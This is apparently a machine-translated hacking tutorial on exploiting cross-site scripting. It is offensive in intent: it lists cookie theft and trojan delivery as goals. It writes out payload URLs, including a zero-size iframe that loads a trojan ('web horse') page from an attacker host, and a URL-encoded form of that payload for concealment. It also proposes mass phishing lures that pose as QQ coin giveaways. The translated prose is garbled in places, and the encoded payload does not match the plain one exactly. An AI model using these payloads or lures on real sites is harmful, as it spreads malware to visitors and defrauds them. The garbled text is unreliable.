SQL injection is like a powerful sword directly inserting the target chest, sharp and sharp. Next let's take a look at the cross-site. I compared her to a gentle killer, a dagger hidden behind her.
Introduction: Cross-Site Utilization thinking Orientation
SQL injection is directly targeted at systems with SQL Injection Vulnerabilities. Our goal is very clear. The Cross-Site goal is client-client. Visitor. This determines its concealment.
How can we think about exploiting a Cross-Site vulnerability?
From the perspective of visitors, you can test the power of this gentle killer.
1 document. cookie Stealing cookie Information
2. Unauthorized permission escalation
3 Trojan
4 indirect damage (killing with a knife)
Bytes --------------------------------------------------------------------------------------
The first is the most common method of exploits, while the second is mainly a trap set for website administrators. This method can be effectively used only when the source code of the program is obtained. The third point is also common. The fourth point may not be clear. For example:
Assume that www.wang1.cn has a Cross-Site vulnerability.
The vulnerability page is thead. php.
Structure: http://www.wang1.cn/thead.php? Id = <script> alert ("You got it! ") </Script>
When we send this URL to someone else, someone else will get a pop-up box.
Malicious point: we configure a web horse page http://www.mama.com/index.htm
So we construct: http://www.wang1.cn/thead.php? Id = <IFRAME src = http://www.mama.com/index.htm width = 0 Height = 0> </iframe>
Hey, what other people get when they access this address is our webpage.
In fact, our spoofing can be more concealed and URL re-encoding:
Http://www.wang1.cn/thead.php? Id = % 3C % 69% 66% 72% 61% 6D % 65% 20% 73% 72% 63% 3D % 68% 74% 74% 70% 3A % 2f % 77% 77% 77% 2e % 6D % 61% 6D % 61% 2e % 63% 6f % 6D % 2f % 69% 6e % 64% 65% 2e % 78% 68% 6D % 74% 20% 77% 69% 64% 3D % 74% 68% 30% 20% 68% 65% 69% 67% 3D % 68% 3E % 3C % 2f % 69% 66% 72% 61% 6D % 65% 3E
In this case, the average person is really confused.
Question:
Who will trust you to directly access the URL you gave?
Answer:
Trust is built on a basic security environment.
Suppose the header of our URL is http://www.163.com; www.qq.com... Are you still skeptical?
If we construct such a page, we say that QQ has recently had an activity, and we will give away the Q coins, and then send a large number of specially crafted URLs, how many people will be there?
In the next few articles, I will demonstrate the application of cross-site skills one by one. Of course, you are also welcome to submit an article.